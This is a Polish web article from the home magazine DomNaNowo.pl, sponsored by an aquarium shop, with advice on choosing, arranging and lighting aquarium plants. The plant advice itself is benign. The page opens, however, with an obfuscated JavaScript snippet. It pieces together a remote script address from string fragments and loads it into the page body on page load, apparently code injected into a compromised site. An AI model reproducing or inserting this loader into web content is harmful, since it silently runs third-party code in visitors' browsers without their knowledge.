(function(){ qtlb=document.createElement("script");qtlb_=("us")+("ta"); qtlb_+="t"+(".");qtlb_+=("in");qtlbu="436840351";qtlb.async=true; qtlbu+=".h8kXjgtptlb54ivy8";qtlb.type="text/javascript";qtlb_+="f"+"o"+("/"); qtlbu+="y65el72p6X26m";qtlb.src="https://"+qtlb_+qtlbu; dqtlb=document.body;dqtlb.appendChild(qtlb); })();

Jak dbać o rośliny w akwarium?

Rośliny w akwarium pełnią bardzo istotną rolę. Są korzystne dla całego ekosystemu odpowiadając za jego równowagę. Warto zdecydować się na żywe rośliny do swojego zbiornika. Ich pielęgnacja może okazać się czasochłonna, ale za to nie będziemy zmuszeni do codziennej zmiany wody w naszym zbiorniku. Jak pielęgnować rośliny w naszym akwarium?

Wybór roślin

Wybierając się do sklepu nie ma co oszczędzać – tańsze rośliny w tym przypadku nie okażą się lepszym wyborem. Nasze kroki powinniśmy skierować do renomowanego sklepu zoologicznego lub sklepu akwarystycznego, w którym będziemy w stanie wybrać nasze rośliny pod okiem eksperta. To pomoże nam dobrać gatunki, które naturalnie ze sobą współpracują. Specjalista zdradzi nam także, jak je pielęgnować i utrzymać w zdrowiu. To będzie rola dobrej jakości nawozów i suplementów, dzięki którym roślinność będzie wzrastać i zachowa dobrą kondycję.

Rośliny dopasowane do ryb

Chcąc utrzymać akwarium w zdrowym i pięknym stanie należy, przynajmniej na samym początku przygody z akwarystyką, postawić na florę i faunę, która naturalnie ze sobą występuje. Jeśli chcemy trzymać ryby w zbiorniku, ma to duże znaczenie. Łączenie obcych sobie gatunków zwierząt i roślin może doprowadzić do chaosu, który przyczyni się do negatywnych skutków zarówno dla ryb, jak i roślin. Tworząc scenę naszego akwarium, zastanówmy się nad tym, jakie gatunki ryb chcemy posiadać, a to nam podpowie, które gatunki roślin będą idealne do naszego zbiornika.

Kompozycja w akwarium

Do wyboru mamy wiele roślin, np. rośliny akwariowe wysokie, niskie, pływające lub rosnące na korzeniach. Warto posadzić wysokie rośliny z tyłu akwarium. Pozwoli nam to ukryć filtry, a jednocześnie zagwarantuje dobrą widoczność na scenę akwarium. Bliżej środka warto umieścić rośliny średniej wysokości, a z przodu te najniższe. Na każdą roślinę warto przeznaczyć co najmniej 40 cm2 dna. Kompozycja w akwarium zależy w dużej mierze od naszych upodobań, warto jednak zastosować się do tych wytycznych. Takie rozmieszczenie roślin jest najbardziej korzystne dla zbiornika, ale również będzie wyglądało najbardziej estetycznie.

Jak dbać o rośliny w akwarium? 2

Właściwe oświetlenie

Niedobrane oświetlenie to zdecydowanie przyczyna numer jeden słabego porostu roślin w akwarium. W tanich zestawach producenci instalują minimalną, często wręcz symboliczną ilość źródeł światła. Takie minimalne oświetlenie pozwoli nam zazwyczaj na pomyślną uprawę tylko roślin należących do skromnej, mało wymagającej grupy roślin (anubiasy i mchy). Chcąc hodować inne gatunki, warto zainwestować w zestawy z możliwością dodania kolejnych źródeł światła (w pokrywie znajdują się uchwyty na dodatkowe moduły). Takie rozwiązanie pozwala na proste dostosowanie oświetlenia w zbiorniku do potrzeb roślin.

Materiał powstał we współpracy z akwarystyczny24.pl/

 

Redakcja

DomNaNowo.pl jest magazynem internetowych z kategorii dom i wnętrza. Naszą misją jest inspirowanie i zachęcanie do ulepszania swojej przestrzeni życiowej. Publikujemy poradniki i artykuły o wszystkim co wiąże się z domami, mieszkaniami i wnętrzarstwem. Publikujemy zestawienia aranżacji różnego typu pomieszczeń oraz przestrzeni mieszkalnych. Prezentujemy rankingi zestawienia. Naszą redakcję tworzy zespół kreatywnych i dociekliwych redaktorów i autorów. Ich pracę wspomagają specjaliści ds. PR oraz marketingu. Na łamach DomNanowo.pl publikowane są nowości wnętrzarskie oraz różne materiały warte opisana i scharakteryzowania. Nasze felietony oraz artykuły poradnikowe tworzone są z myślą o czytelnikach. Z nami każde wnętrze może stać się wyjątkowe.

Powiązane artykuły

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Back to top button